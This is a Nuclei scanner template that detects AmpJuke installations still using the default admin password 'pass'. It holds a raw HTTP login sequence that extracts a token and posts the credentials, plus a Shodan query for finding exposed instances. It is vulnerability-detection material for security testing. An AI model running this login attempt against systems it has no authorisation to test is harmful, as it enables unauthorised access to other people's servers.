nuclei-templates/http/default-logins/ampjuke-default-login.yaml

id: ampjuke-default-login

info:
  name: AmpJuke - Default Login
  author: ritikchaddha
  severity: high
  description: |
    AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found.    
  metadata:
    max-request: 3
    shodan-query: "http.favicon.hash:-121681558"
  tags: default-login,ampjuke

http:
  - raw:
      - |
        GET /login.php HTTP/2
        Host: {{Hostname}}        

      - |
        POST /loginvalidate.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        uuid={{url_encode(token)}}&login={{username}}&password={{password}}&Submit=Submit        

      - |
        GET /index.php?what=welcome HTTP/2
        Host: {{Hostname}}        

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - pass

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - 'AmpJuke'
          - 'Track'
          - 'Logout'
          - 'Random play'
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body_1
        name: token
        group: 1
        regex:
          - 'name="uuid" value="([./a-z0-9-]+)">'
        internal: true
# digest: 4b0a004830460221009a7d7a4053a55ee2fd87bdb54447c57918b5e01753144450843af403ebb10aa40221009417d55a42799dd32bc24720a398c20dcea43f7f16c933fae4ec213ea2ea75fe:922c64590222798bb761d5b6d8e72950